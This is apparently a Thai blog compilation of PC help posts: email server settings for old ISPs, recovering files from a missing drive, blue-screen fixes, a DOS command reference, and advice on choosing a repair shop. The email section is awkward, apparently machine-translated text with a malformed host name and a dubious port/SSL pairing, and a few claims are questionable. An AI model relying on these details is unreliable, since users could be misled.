Netscape ระบบ E – mail Web – based ซึ่งหมายความว่าคุณสามารถเข้าถึงอีเมลของพวกเขาจากการเชื่อมต่ออินเทอร์เน็ตใด ๆ Netscape บริการอินเทอร์เน็ตยังสนับสนุน AOL ® Communicator, Microsoft ® Outlook, Microsoft ® Outlook Express, และอื่น ๆ ซอฟต์แวร์ POP3 e – mail เซิร์ฟเวอร์จดหมายขาออก SSL ความต้องการการสนับสนุนเพื่อให้แน่ใจว่าซอฟต์แวร์ไคลเอนต์อีเมลของคุณสนับสนุนการเชื่อมต่อผ่านโปรโตคอล SSL SMTP
Netscape บริการอินเทอร์เน็ตที่เข้ามา Mail Server (POP3) — pop.3.isp.netscape.com (port 110)
Netscape Internet Service ออก Server Mail — smtp.isp.netscape.com (25 พอร์ตโดยใช้การเชื่อมต่อแบบ SSL)
•การตั้งค่า Mail Tiscali

บริการอีเมล Tiscali ช่วยให้คุณสามารถใช้เซิร์ฟเวอร์ของ POP3 และ SMTP สำหรับการเข้าถึงกล่องจดหมายของคุณ Tiscali
Tiscali ที่เข้ามา Mail Server (POP3) — pop.tiscali.com (port 110)
เซิร์ฟเวอร์จดหมายขาออก — การใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ
•การตั้งค่า Mail Freeserve

บริการอีเมล Freeserve ช่วยให้คุณสามารถใช้เซิร์ฟเวอร์ของ POP3 และ SMTP สำหรับการเข้าถึงกล่องจดหมายของคุณ Freeserve
Freeserve Incoming Mail Server (POP3) — pop.freeserve.com (port 110)
เซิร์ฟเวอร์จดหมายขาออก — การใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ
•การตั้งค่า Mail Supanet

บริการอีเมล Supanet ช่วยให้คุณสามารถใช้เซิร์ฟเวอร์ของ POP3 และ SMTP สำหรับการเข้าถึงกล่องจดหมายของคุณ Supanet
ที่เข้ามา Supanet Mail Server (POP3) — pop.supanet.com (port 110)
เซิร์ฟเวอร์จดหมายขาออก — การใช้ภายใน ISP mail SMTP เซิร์ฟเวอร์ของคุณ

หากโปรแกรมอีเมล์ของคุณไม่สนับสนุน Hotmail เป็นผู้ให้บริการจดหมายหรือถ้ามันก็จะไม่ทำงานกับการตั้งค่าเซิร์ฟเวอร์จดหมายของคุณคุณสามารถใช้ที่ 3 การแก้ไขอื่นเช่น Hotmail Popper, IzyMail, POP Peeper หรือ Email2Pop เมื่อใช้เครื่องมือดังกล่าวคุณควรกำหนดบัญชี Hotmail ของคุณเป็นบัญชี POP3 และคุณจะต้องกำหนดเซิร์ฟเวอร์จดหมายขาเข้าของคุณจะ’localhost’เป็น (หรือ 127.0.0.1)

วันนี้จะมาขอแนะนำวิธีกู้ข้อมูล ในกรณีที่ไดร์หายไปครับ เพื่อนๆ คงเคยเจอกันนะนครับ ที่จู่ๆ ก็เข้าไดร์ C: หรือ D: ไม่ได้ พอดูที่ใน My Computer กลับเห็นไดร์แต่ไม่เห็นขนาด อย่างนี้เป็นต้น ถ้าเจออาการอย่างนี้เราก็เริ่มสันนิษฐานกันได้แล้วว่า


1.ฮาร์ดดิสอาจมีปัญหา ให้ลอง scan disk ดู อาจใช้คำสั่ง chkdsk หรือใช้โปรแกรมก็ได้

2.หากฮาร์ดดิสไม่มีปัญหา แสดงว่า windows อาจมีปัญหา ต้องลง windows ใหม่

            ดังนั้นสิ่งที่เราต้องทำแน่ๆ หากไม่สามารถทำให้มันแสดงไดร์เหมือนเดิมคือ การกู้ข้อมูลซึ่งทำได้ง่ายๆ ครับ 2-3 วิธีดังนี้


1.ถอดฮาร์ดดิสตัวดังกล่าวไปต่อกับเครื่องอื่น แล้วจะสามารถมองเห็นไดร์ที่หายไปและ copy ข้อมูลได้

2.หากไม่ต้องการต่อฮาร์ดดิสเพราะยุ่งยากก็ต้องมี adapter สำหรับต่อฮาร์ดดิสเข้ากับพอร์ท USB ราคา adapter ก็ประมาณ 500 กว่าบาทครับ ใช้ได้ทั้งฮาร์ดดิสแบบ IDE และ SATA

3.ส่วนวิธีสุดท้ายที่ผมใช้บ่อยครับ ก็คือหาแผ่นโปรแกรมที่สามารถใช้ boot windows ได้จากแผ่นครับ ที่ผมอยากแนะนำคือ Hiren ’s boot CD แผ่นนี้ใช้ประโยชน์ได้มากมายครับ วิธีใช้ก็คือ

3.1 ใส่แผ่น Hiren ’s boot CD ลงในไดร์ CD

3.2 จะแสดงเมนูให้เราเลือก boot ดังนี้
-boot from harddisk
-boot from cd
-miniXP

ให้เลือก boot จาก MiniXP เป็นการ boot windows จากแผ่น คราวนี้ก็จะไม่ต้องใช้ไฟล์ windows ของเครื่อง ดังนั้นจะมองเห็นไดร์และสามารถ copy ข้อมูลได้อย่างแน่นอน โดยที่ไม่ต้องถอดฮาร์ดดิสออกไปต่อกับเครื่องไหน ให้ยุ่งยากเลยครับ

หลายคนคงเคบเจอกับปัญหา blue screen หรือ หน้าจอสีฟ้ากันดีนะครับ อาการนี้เป็นการบ่งบอกว่าคอมพิวเตอร์ของเราเริ่มมีปัญหา ซึ่งโดยส่วนใหญ่จะเกี่ยวข้องกับฮาร์ดแวร์ครับ หรือไม่ก็อาจจะไม่ใช่ก็เป็นได้ครับ
เอาเป็นว่าหากท่านเจอปัญหานี้ให้ดำเนินการดังนี้ครับ
1.อ่านข้อความที่หน้าจอสีฟ้าก่อนเป็นอันดับแรก และจดบันทึก error code เก็บเอาไว้ก่อนครับ
2.ให้ restart เครื่อง 1 รอบครับ สำหรับหลายๆ กรณี แค่ restart เครื่องอาการก็หายไป
3.หาก restart เครื่องแล้วยังไม่หาย ให้สังเกตุพฤติกรรมที่เราทำไปก่อนที่จะเจอ blue screen ครับดังนี้

-หากเพิ่งติดตั้งโปรแกรม หรือไดรว์เวอร์อะไรลงไป ให้เอาโปรแกรมหรือไดรว์เวอร์นั้นออกครับ

-หากใส่อุปกรณ์ฮาร์ดแวร์อะไร เพิ่มลงไปใหม่ เช่นการ์ดแลน โมเด็ม ให้เอาออกครับ

-หากไม่ได้ทำอะไรกับเครื่อง จู่ๆก็เกิด blue screen ขึ้นมา หรือเปิดเครื่องขึ้นมาก็เจอ blue screen เลย ให้เอาเครื่องไปเป่าฝุ่นครับ อาการ blue screen ที่เกิดจากฝุ่นแบบนี้ผมเจอบ่อยครับ พอเอาไปเป่าฝุ่นก็หายเลย บางเครื่องเกิด blue screen พอ restart ก็หายพอเปิดใหม่ก็เจอ blue screen อีก restart แล้วหาย พอเปิดใหม่ก็เป็นอีก สุดท้ายเอาไปเป่าฝุ่น อาการหายยาวไปเลยครับ

4.หากแก้ปัญหาดังวิธีด้านบนแล้วยังไม่หาย ก็เอา error code ที่จดไว้ในข้อ 1 ไปค้นหาใน google ดูครับ เราก็จะรู้ว่าฮาร์ดแวร์หรือซอฟแวร์ส่วนใดที่เป็นปัญหา แต่ก็ไม่ใช่ว่าจะเจอ error code ทุกครั้งที่ search นะครับ หากไม่พบก็ต้องลอง check ฮาร์ดแวร์เองครับ หลักๆ ก็ฮาร์ดดิส แรม ครับ 

รวมคำสั่ง DOS เวลาซ่อมคอมจ้า

ความจำเป็นในการใช้ (Dos) ยังคงมีอยู่ แม้ว่าในปัจจุบันบทบาทของมันจะเริ่มลดลงไปมากหลังจาก Windows
เริ่มมีความสมบูรณ์และมีสิ่งอำนวยความสะดวกมาให้ชนิดที่ไม่ต้องพึ่งดอสเลย แต่ถ้าเมื่อไรเครื่องของคุณยังไม่มี Windows หรือเข้าไปใช้งาน Windows ไม่ได้
คำสั่งดอสก็มีความจำเป็นอย่างยิ่ง เพราะการใช้คำสั่งดอสจะช่วยแก้ปัญหาต่าง ๆ ได้เช่นการ การซ่อมแซมไฟล์ที่เสีย ก๊อปปี้ไฟล์ข้อมูล แก้ปัญหา Bad Sector ฯลฯ
ดังนี้เราควรทราบคำสั่งบางคำสั่งที่จำเป็นไว้บ้างเพื่อนำไปใช้งานในยามฉุกเฉิน
Dos ย่อมาจาก Disk Operating System เป็นระบบปฎิบัติการรุ่นแรก ๆ ซึ่งการทำงานของเครื่องคอมพิวเตอร์จะมีการทำงานบนระบบปฎิบัติ
การดอสเป็นหลัก
โดยการทำงานส่วนใหญ่จะเป็นการทำงานโดยการใช้คำสั่งผ่านบรรทัดคำสั่ง (Command Line) ที่นิยมใช้กันคือ MS-Dos
ซึ่งต่อมาระบบปฎิบัติการดอสจะถูกซ่อนอยู่ใน Windows ลองมาดูกันว่าคำสั่งไหนบ้างที่เราควรรู้จักวิธีใช้งาน

CD คำสั่งเข้า-ออก ในไดเร็คทอรี่
CD (Change Directory) เป็นคำสั่งที่ใช้ในการเปลี่ยนไดเร็คทอรี่ในโหมดดอส เช่น ถ้าต้องการรัน คำสั่งเกมส์ที่เล่นในโหมดดอส ซึ่งอยู่ในไดเร็คทอรี MBK
ก็ต้องเข้าไปในไดเร็คทอรีดังกล่าวเสี่ยก่อนจึงจะรันคำสั่งเปิดโปรแกรมเกมส์ได้
รูปแบบคำสั่ง
CD [drive :] [path]
CD[..]
เมื่อเข้าไปในไดเร็คทอรีใดก็ตาม แล้วต้องการออกจากไดเร็คทอรีนั้น ก็เพียงใช้คำสั่ง CD\ เท่านั้นแต่ถ้าเข้าไปในไดเร็คทอรีย่อยหลาย ๆ ไดเร็คทอรี
ถ้าต้องการออกมาที่ไดรว์ซึ่งเป็นระดับสูงสุด ให้ใช้คำสั่ง CD\ เพราะคำสั่ง CD.. จะเป็นการออกจากไดเร็คทอรีได้เพียงลำดับเดียวเท่านั้น
ตัวอย่างการใช้คำสั่ง

CD\ กลับไปที่ Root ระดับสูงสุด เช่น ถ้าเดิมอยู่ที่ C:\>docs\data> หลังจากใช้คำสั่งนี้ก็จะย้อนกลับไปที่ C:\ >
CD.. กลับไปหนึ่งไดเร็คทอรี เช่น ถ้าเดิมอยู่ที่ C:\windows\command> หลังจากนั้น ใช้คำสั่งนี้ก็จะก็จะย้อนกลับไปที่ C:\windows>

CHKDSK (CHECK DISK) คำสั่งตรวจเช็คพื้นที่ดิสก์
CHKDSK เป็นคำสั่งที่ใช้ในการตรวจสอบข้อมูลของหน่วยความจำ และการใช้งานดิสก์หรือฮาร์ดดิสก์ การรายงานผลของคำสั่งนี้จะเข้าไปตรวจสอบพื้นที่ไดเร็คทอรี และ FAT
ของดิสก์ หรือไฟล์ เพื่อหาข้อมผิดพลาดของการเก็บบันทึก ถ้า CHKDSK พบว่ามี Lost Cluster จะยังไม่แก้ไขใด ๆ นอกจากจะใช้สวิตซ์ /f
กำหนดให้ทำการเปลี่ยน Lost Cluster ให้เป็นไฟล์ที่มีชื่อไฟล์เป็น FILE0000.CHK ถ้าพบมากว่า 1 ไฟล์ อันต่อไปจะเป็น FILE0002.CHK
ไปเรื่อย ๆ นอกจากนี้ยังสามารถรายงานปัญหาที่ตรวจพบได้อีก อย่างเช่น จำนวน Bad Sector , Cross-ling Cluster
(หมายถึง Cluster ที่มีไฟล์มากกว่าหนึ่งไฟล์แสดงความเป็นเจ้าของ แต่ข้อมูลใน Cluster จะเป็นของไฟล์ได้เพียงไฟล์เดียวเท่านั้น)
รูปแบบคำสั่ง
CHKDSK [drive:][[path]filename] [/F] [/V]
[drive:][path] กำหนดไดรว์ และไดเร็ทอรีที่ต้องการตรวบสอบ
filename ชื่อไฟล์ที่ต้องการให้ตรวจสอบ
/F สั่งให้ Fixes Errors ทันทีที่ตรวจพบ
/V ขณะที่กำลังตรวจสอบ ให้แสดงชื่อไฟล์และตำแหน่งของดิสก์บนหน้าจอด้วย
ตัวอย่างการใช้คำสั่ง

C:\WINDOWS>CHKDSK D: ตรวจสอบข้อมูลการใช้งานดิสก์ในไดรว์ D
C:\>CHKDSK C: /F ตรวจสอบ ไดรว์ C พร้อมกับซ่อมแซมถ้าตรวจเจอปัญหา

COPY คำสั่งคัดลอกไฟล์
Copy เป็นคำสั่งที่ใช้ในการคัดลอกไฟล์ จากไดเร็คทอรีหนึ่งไปยังไดเร็คทอรีที่ต้องการ คำสั่งนี้มีประโยชน์มากควรหัดใช้ให้เป็น เพราะสามารถคัดลอกไฟล์ได้ยามที่ Windows
มีปัญหา
รูปแบบคำสั่ง
COPY [Source] [Destination]
ตัวอย่างการใช้คำสั่ง

C:\COPY A:README.TXT คัดลอกไฟล์ชื่อ README.TXT จากไดรว์ A ไปยังไดรว์ C
C:\COPY README.TXT A: คัดลอกไฟล์ชื่อ README.TXT จากไดรว์ C ไปยังไดรว์ A
C:\INFO\COPY A:*.* คัดลอกไฟล์ทั้งหมดในไดรว์ A ไปยังไดเร็คทอรี INFO ในไดรว์ C
A:\COPY *.* C:INFO คัดลอกไฟล์ทั้งหมดในไดรว์ A ไปยังไดเร็คทอรี INFO ในไดรว์ C

DIR คำสั่งแสดงไฟล์และไดเร็คทอรีย่อย
เป็นคำสั่งที่ใช้แสดงรายชื่อไฟล์และไดเร็คทอรี คำสั่งนี้ถือเป็นคำสั่งพื้นฐานที่ต้องใช้อยู่เป็นประจำ เพื่อจะได้รู้ว่าในไดรว์หรือไดเร็คทอรีนั้น ๆ มีไฟล์หรือไดเร็คทอรีอะไรอยู่บ้าง
รูปแบบคำสั่ง
DIR /P /W
/P แสดงผลทีละหน้า
/W แสดงในแนวนอนของจอภาพ
ตัวอย่างการใช้คำสั่ง

C:\>DIR ให้แสดงรายชื่อไฟล์ และไดเร็คทอรีทั้งหมดในไดรว์ C
C:\>DIR /W ให้แสดงรายชื่อไฟล์ และไดเร็คทอรีทั้งหมดในไดรว์ C ในแนวนอน
C:\>INFO\DIR /P ให้แสดงรายชื่อไฟล์ และไดเร็คทอรีย่อยในไดเร็คทอรี INFO โดยแสดงทีละหน้า
C:\>INFO\DIR *.TEX ให้แสดงรายชื่อไฟล์ทั้งหมดในไดเร็คทอรี INFO เฉพาะที่มีนามสกุล TXT เท่านั้น
C:\> DIR BO?.DOC ให้แสดงรายชื่อไฟล์ในไดรว์ C ที่ขึ้นต้นด้วย BO และมีนามสกุล DOC ในตำแหน่ง ? จะเป็นอะไรก็ได้
DEL (DELETE) คำสั่งลบไฟล์
เป็นคำสั่งที่ใช้ในการลบไฟล์ ซึ่งต้องระมัดระวังในการใช้คำสั่งนี้ให้มาก
รูปแบบคำสั่ง
DEL [ชื่อไฟล์ที่ต้องการลบ]
ตัวอย่างการใช้คำสั่ง

C:\>DEL BOS.VSD ลบไฟล์ในไดรว์ C ที่ชื่อ BOS.VSD
C:\>PROJECT\DEL JOB.XLS ลบไฟล์ชื่อ JOB.XLS ที่อยู่ในไดเร็คทอรี PROJEC ของไดรว์ C
D:\>DEL *.TXT ลบทุกไฟล์ที่มีนามสกุล TXT ในไดรว์ D

FDISK ( Fixed Disk)
เป็นไฟล์โปรแกรมที่ใช้ในการจัดการกับพาร์ติชั่นของฮาร์ดิสก์ ใช้ในการสร้าง ลบ กำหนดไดรว์ ที่ทำหน้าที่บูตเครื่อง แสดงรายละเอียดของพาร์ติชันบนฮาร์ดิสก์
จะเห็นว่าเป็นโปรแกรมอีกตัวหนึ่งที่ต้องทำความรู้จักและศึกษาวิธีใช้งาน เพราะสามารถใช้ประโยชน์ในการสร้าง ฮาร์ดดิสก์ให้มีหลาย ๆ ไดรว์ก็ได้
รูปแบบคำสั่ง
FDISK /STATUS
ตัวอย่างการใช้งานโปรแกรม

A:>\FDISK เริ่มใช้งานโปรแกรม
A:\>FDISK /STATUS แสดงข้อมุลเกี่ยวกับพาร์ติชันบนฮาร์ดดิสก์

FORMAT คำสั่งฟอร์แมตเครื่อง
เป็นคำสั่งใช้จัดรูปแบบของดิสก์ใหม่ คำสั่งนี้ปกติจะใช้หลังการแบ่งพาร์ชันด้วยคำสั่ง FDISK เพื่อให้สามารถใช้งานฮาร์ดดดดิสก์ได้
หรือฝช้ล้างข้อมูลกรณีต้องการเคลียร์ข้อมูลทั้งหมดในฮาร์ดิสก์
รูปแบบคำสั่ง
FORMAT drive: [/switches]
/Q ให้ฟอร์แมตแบบเร็ว ซึ่งจะใช้เวลาน้อยลง (Quick Format)
/S หลังฟอร์แมตแล้วให้คัดลอกไฟล์ระบบลงไปในไดรว์นั้นด้วย เพื่อให้ไดรว์ที่ทำการฟอร์แมตสามารถบูตได้
ตัวอย่างการใช้คำสั่ง

A:\>FORMAT C: /S ฟอร์แมตไดรว์ C แล้วให้คัดลอกไฟล์ระบบลงไปในไดรว์ด้วย
C:\>FORMAT A: /Q ฟอร์แมตไดรว์ A แบบ Quick Format

MD คำสั่งสร้างไดเร็คทอรี
MD (Make Directory) เป็นคำสั่งที่ใช้ในการสร้างไดเร็คทอรี คำสั่งนี้จะช่วยให้สามารถสร้างไดเร็คทอรีชื่ออะไรก็ได้ที่เราต้องการ
แต่ต้องมีการตั้งชื่อที่อยู่ในกฎเกณฑ์ของ Dos
รูปแบบคำสั่ง
MD [drive:] path
ตัวอย่างการใช้คำสั่ง

D:\> MD TEST สร้างไดเร็คทอรี TEST ขึ้นมาในไดรว์ D
D:\>DOC\MD TEST สร้างไดเร็คทอรีที่ชื่อ TEST ขึ้นมาภายในไดเร็คทอรี DOC

REN (RENAME) คำสั่งเปลี่ยนชื่อไฟล์
เป็นคำสั่งที่ใช้ในการเปลี่ยนชื่อไฟล์ และส่วนขยาย โดยคำสั่ง REN นี้ไม่สามารถใช้เปลี่ยนชื่อไดเร็คทอรีได้
รูปแบบคำสั่ง
REN [ชื่อไฟล์เดิมล [ชื่อไฟล์ใหม่]
ตัวอย่างการใช้คำสั่ง

C:\REN BOS.DOC ANN.DOC เปลี่ยนชื่อไฟล์ BOS.DOC ในไดรว์ C เป็น ANN.DOC
C:\REN C:\MAYA\BOS.DOC PEE.DOC เปลี่ยนชื่อไฟล์ BOS.DOC ในไดเร็คทอรี MAYA ให้เป็น PEE.DOC
C:\REN A:*.*TEX *.OLD เปลี่ยนส่วนขยายของไฟล์ชนิด TXT ทุกไฟล์ในไดรว์ A ให้เป็น OLD

SCANDISK
คำสั่ง SCANDISK เป็นคำสั่งตรวจสอบพื่นที่ฮาร์ดดิสก์ สามารถใช้ในการตรวบสอบปัญหาต่าง ๆ ได้ และเมื่อ SCANDISK
ตรวจพบปํญหา จะมีทางเลือกให้ 3 ทางคือ FIX IT , Don't Fix IT และ More Info ถ้าไม่เข้าใจปัญหาที่เกิดขึ้นให้เลือก More Info
เพื่อขอข้อมูลเพิ่มก่อนตัดสินใจต่อไป
ถ้าเลือก FIX IT จะเป็นการสั่งให้ Scandisk ทำการแก้ไขปัญหาที่พบ ถ้าการซ่อมแซมสำเร็จโปรแกรมจะมีรายงานที่จอภาพให้ทราบ ส่วน Don't Fix IT
คือให้ข้ามปัญหาที่พบไปโดยไม่ต้องทำการแก้ไข
รูปแบบคำสั่ง
SCANDISK [Drive:]/AUTOFIX
/AUTOFIX ให้แก้ไขปัญหาโดยอัตโนมัติ
ตัวอย่างการใช้คำสั่ง

A:\>SCANDISK C: ทำการตรวจสอบปัญหาในไดรว์ C
A:\>SCANDISK D:/AUTOFIX ทำการตรวจสอบปัญหาในไดรว์ D และแก้ไขอัตโนมัติ
Type คำสั่งดูข้อมูลในไฟล์
Type เป็นคำสั่งที่ใช้แสดงเนื้อหาภายในไฟล์บนจอภาพ คำสั่งนี้จะใช้ได้กับไฟล์แบบ Text ส่วนไฟล์โปรแกรมต่าง ๆ จะไม่สามารถอ่านได้
รูปแบบคำสั่ง
TYPE [ชื่อไฟล์ที่ต้องการอ่าน]
ตัวอย่างการใช้คำสั่ง

C:\>Type AUTOEXEC.BAT แสดงเนื้อหาภายในไฟล์ AUTOEXEC.BAT
C:\>NORTON\TYPE README.TXT แสดงเนื้อหาภายในไฟล์ README.TXT ในไดเร็คทอรี NORTON

XCOPY คำสั่งคัดลอกทั้งไดเร็คทอรีและทั้งหมดในไดเร็คทอรี
XCOPY เป็นคำสั่งที่ใช้ในการคัดลอกไฟล์ได้เหมือนคำสั่ง COPY แต่ทำงานได้เร็วกว่า และสามารถคัดลอก ได้ทั้งไดเร็คทอรีและไดเร็คทอรีย่อย
รูปแบบคำสั่ง
XCOPY [ต้นทาง] [ปลายทาง] /S /E
/E ให้คัดลอกไดเร็คทอรีย่อยทั้งหมดรวมถึงไดเร็คทอรีย่อยที่ว่างเปล่าด้วย
/S ให้คัดลอกไดเร็คทอรีย่อยที่ไม่ว่างเปล่าทั้งหมด
ตัวอย่างการใช้คำสั่ง

C:\>XCOPY BACKUP F: /S /E คัดลอกทุกไฟล์และทุกไดเร็คทอรีย่อย BACKUP ไปไว้ในไดรว์ F
C:\>PRINCE>XCOPY *.VSD A: คัดลอกทุกไฟล์ที่มีนามสกุล VSD ในไดเร็คทอรี PRINCE ไปที่ไดรว์ A

ข้อความแจ้งปัญหาในดอส
ในการทำงานบนดอสบางครั้งก็เกิดปัญหาได้บ่อย ๆ เหมือนกัน ซึ่งการเกิดปัญหาแต่ละครั้งก็จะมีข้อความแจ้งให้ทราบว่าปัญหาที่เกิดขึ้นนั้น มีสาเหตุจากอะไร
ต่อไปนี้เป็นข้อความแจ้งปัญหาที่มักพบได้บ่อย ๆ มีดังนี้
Abort, Retry, Fail ?
จะพบได้ในการณีที่ไดรว์ไม่มีแผ่นดิสก์อยุ่แล้วเรียกใช้ข้อมูลจากไดรว์นั้น การแก้ไขก็นำแผ่นดิสก์ที่ต้องการใช้มาใส่เข้าไป

กดปุ่ม < R > (Retry) : การทำงานจะทำต่อจากงานที่ค้างอยู่ก่อนเกิดความผิดพลาด
กดปุ่ม < A > (Abort) : รอรับคำสั่งจะไปอยู่ในไดรว์ที่สั่งงานล่าสุด
กดปุ่ม < F > (Fail) : เมื่อต้องการยกเลิกการทำงาน และเปลี่ยนไดรว์ใหม่

Bad Command or file name : ใช้คำสั่งผิดหรือไฟล์ที่เรียกใช้งานนั้นไม่สามารถเรียกใช้ได้ การแก้ไข ตรวจสอบบรรทัดคำสั่งว่าถูกต้องหรือไม่
เช่น พิมพ์คำสั่งหรือชื่อไฟล์ถูกต้องหรือไม่ แล้วลองรันคำสั่งดูใหม่อีกครั้ง อาจเกี่ยวข้องกับเวอร์ชันของดอสไม่มีคำสั่งนั้นก็ได้

File not found : ไม่สามารถหาไฟล์นั้นพบ อาจไม่มีไฟล์นั้น หรืออาจพิมพ์ชื่อไฟล์นั้นนผิดจากที่ต้องการ นอกจากนี้อาจเกิดจากพาธ (Path) ที่สั่งงานไม่มีไฟล์นั้น

Insufficient memory หรือ Out of memory Insufficient memory : หน่วยความจำไม่พอต่อความต้องการของโปรแกรม

Out of memory : โปรแกรมเริ่มทำงานไปแล้วบางส่วนแล้วหน่วยความจำไม่พอ ระบบจึงต้องแจ้งให้ผู้ใช้ทราบ

Directory already exits : เกิดขึ้นเมื่อสร้างไดเร็คทอรีแล้วไปซ้ำกับซื่อที่มีอยู่แล้วในพาธเดียวกัน

Duplicate file ot file not found : ถ้าเปลี่ยนชื่อไฟล์ไปซ้ำกับชื่อที่มีอยู่จะทำไม่ได้และจะแจ้งเตือนดังข้อความดังกล่าว

InSufficient Disk space : ข้อความนี้จะเกิดขึ้นเมื่อดิสก์ไม่เพียงพอต่อการเก็บข้อมูล วิธีแก้ ลองใช้ดิสก์อื่นหรือลบไฟล์ที่ไม่จำเป็นต้องใช้ออก

ปัญหามันเกิดจากโน๊ตบุ๊ค แล้วอยู่ดีๆ มันก้อขึ้นจอฟ้า stop code 0X000000ED โค๊ดแบบนี้ อ่านก้อแทบไม่ทัน มันก้อรีสตาร์ทใหม่
แล้วมันก้อเป็นแบบเดิมงี้วนไปตลอดยังไม่เข้าวินโดว์เลย

(stop code 0X0000007B)
สาเหตุและแนวทางแก้ไข:
อาการนี้จะมักเจอตอนบูตวินโดวส์ จะมีข้อความบอกว่าไม่สามารถอ่านข้อมูลของไฟล์ระบบหรือ Boot partitions
ได้ ให้ตรวจฮาร์ดดิสก์ว่าปกติหรือไม่ สายแพหรือสายไฟที่เข้าฮาร์ดดิสก์หลุดหรือไม่ ถ้าปกติดีก็ให้ตรวจไฟล์ Boot.ini
อาจจะเสีย หรือไม่ก็มีการทำงานแบบ Multi OS ให้ตรวจดูว่าที่ไฟล์นี้อาจเขียน Config ของ OS ขัดแย้งกัน
อีกกรณีหนึ่งที่เกิด error นี้ คือเกิดขณะ upgrade วินโดวส์ สาเหตุจากมีอุปกรณ์บางตัวไม่ Compatible
ให้ลองเอาอุปกรณ์ที่ไม่จำเป็นหรือคิดว่ามีปัญหาออก เมื่อทำการ upgrade วินโดวส์ เรียบร้อย ค่อยเอาอุปกรณ์ที่มีปัญหาใส่กลับแล้วติดตั้งด้วยไดร์เวอร์รุ่นล่าสุด

วิธีแก้มาแบบนี้
ใช้คำสั่ง chkdsk /rจากหน้าต่าง Recovery console ( บูตจากซีดีแล้วเลือกคำสั่ง “R” เพื่อเปิดหน้าต่าง Recovery)

บ่อยครั้งที่คอมพิวเตอร์มีปัญหา เช่น อาการจอมืด , ซีดีรอมไม่ทำงาน หรือฮาร์ดิสก์เสีย ถึงแม้ว่าตอน ซื้อมาจะมีการรับประกัน 2 ถีง 3 ปี แต่โดยส่วนใหญ่แล้วผู้ใช้จะไม่ได้ซื้อ คอมพ์ทุก 2-3 ปีตามระยะการ ประกัน ดั้งนั้นการซ่อมจึงเป็นเรื่องหลีกเลี่ยงไม่ได้ ที่นี้เรามาดูแนวทางการซ่อมคอมพ์พิวเตอร์ด้วยตนเอง

1. บันทึกทุกอย่างเก็บไว้ แม้ว่าการใช้คอมพิวเตอร์ จะทำให้สามารถที่จะทิ้งเอกสารกองโต ออกไปจากโต๊ะทำงาน ได้ก็ตาม แต่ก่อนที่ทิ้งทุกอย่างไป ควรจะทำการหาวิธีในการเก็บข้อมูลเหล่านั้นไว้ เผื่อในกรณีที่อาจเกิดปัญหา ในอนาคต ยอมเสียเวลาสักเล็กน้อยกรอกแบบฟอร์มต่าง ๆ ให้เรียบร้อย ซึ่งผู้ผลิตคอมพิวเตอร์บางราย ก็ให้มีการลงทะเบียนกันแบบออนไลด์ แต่อย่าลืมพิมพ์สำเนาออกมาเก็บรวมไว้กับใบเสร็จรับเงิน เก็บใบเสร็จ รับเงินและใบรับประกันทุกอย่างไว้ให้ดี โดยเฉพาะอุปกรณ์ที่มีการรับประกันแยกต่างหากออกไปไม่รวมกับ ตัวเครื่อง เช่น โมเด็ม , ซีพียู , เมนบอร์ด , จอ และอื่น ๆ

2.ทำการบ้านก่อนเลือกซื้อ ตอนที่ซื้อคอมพิวเตอร์ ควรจะต้องนึกถึงการซ่อมแซมที่จะเกิดขึ้นในอนาคต ในการเลือกซื้อก็ต้องคิดอยู่เสมอว่า บางร้านรับซ่อมจะมีการคิดค่าตรวจสอบเครื่องด้วย ไม่ว่าเครื่องจะอยู่ใน ประกันหรือไม่ก็ตาม ก่อนซื้อคงจะต้องทำการบ้านกันให้ดีในเรื่องของประกันที่บริษัทมีให้ ไม่ว่าจะในเรื่องประกัน การขยายระยะประกัน หรือว่าค่าธรรมเนียมต่าง ๆ สิ่งเหล่านี้จะทำให้คุณประหยัดทั้งเงินและเวลาได้ในอนาคต

3.จดบันทึกอาการเสีย เมื่อคอมพ์พิวเตอร์มีอาการผิดปกติขึ้น ให้จดบันทึกอาการต่างไว้ โดยเฉพาะอย่างยิ่ง Error Messages ต่างๆ ซึ่งจะมีประโยชน์และจะมีส่วนช่วยช่าง หรือผู้เชี่ยวชาญในการวิเคราะห์สาเหตุเสียได้มาก ให้จดบันทึกอาการที่เกิดขึ้นให้ละเอียดที่สุดเท่าที่จะทำได้ เพื่อที่ช่างจะได้ซ่อมได้เร็วและตรงจุด โดยทั่วไปแล้ว คำถามที่ช่างหรือคนที่จะช่วยเหลือคุณมักจะถามเช่น จอภาพแสดงอาการอย่างไร หรือ Error massage ที่เกิดขึ้นคืออะไร เป็นต้น ถ้าคุณสามารถที่จะตอบคำถามเหล่านี้จะเป็นประโยชน์อย่างมากต่อช่าง และคุณเอง โดยเฉพาะอย่างยิ่งถ้าคุณปรึกษากับช่างผ่านทางโทรศัพท์ แลัก่อนที่จะตัดสินใจเลือกร้านซ่อมก็ให้ตรวจระยะเวลา ประกันของคอมพิวเตอร์และบรรดาอุปกรณ์ต่อพ่วงต่าง ๆ ให้ดี

4.สำรวจให้ทั่ว ๆ การนำเครื่อคอมพิวเตอร์ไปซ่อมกับบริษัทที่คุณซื้อมาก็ไม่ใช้ว่าจะเป็นวิธี ที่ดีเสมอไป เพราะบางครั้งถ้าศึกษาให้ดี ๆ อาจพบว่า ซ่อมกับบริษัทอาจทำให้คุณต้องเสียทั้งเงินและเวลา มากกว่าที่ตวรเป็นก็ได้ วิธีที่น่าจะดีกว่า ก็คือลองสำรวจร้านอื่น ๆ ดูไม่ว่าจะเป็นร้านเล็กหรือใหญ่ ตรวจสอบข้อมูลเรื่องเวลาและราคาในการซ่อมเช่น ค่าตรวจเครื่อง ค่าแรง หรือค่าซ่อมนอกสถานที่ (ในกรณีที่ต้องการให้ช่างมาซ่อมที่บ้าน) เป็นต้น ร้านเล็ก ๆ บางครั้งให้ความสำคัญเป็นกันเองกับลูกค้ามากกว่า ร้านใหญ่ ๆ เนื่องจากมีความต้องการอยู่รอดในการแข่งขันกับร้านใหญ่ ๆ ในขณะเดินสำรวจร้านต่าง ๆ อยู่ให้ลองสังเกคร้านที่ติดโลโก้ยี่ห้อดังเช่น ไอบีเอ็ม , คอมแพค , เป็นต้น ซึ่งมันอาจเป็นไปได้ว่า ร้านนั้น ๆ รับซ่อมเครื่องที่อยู่ในประกันของยี่ห้อนั้น ๆ แต่อย่างไรก็ตามร้านที่รับซ่อมคอมพิวเตอร์ส่วนใหญ่จะรับซ่อม เครื่องทุกยี่ห้ออยู่แล้ว

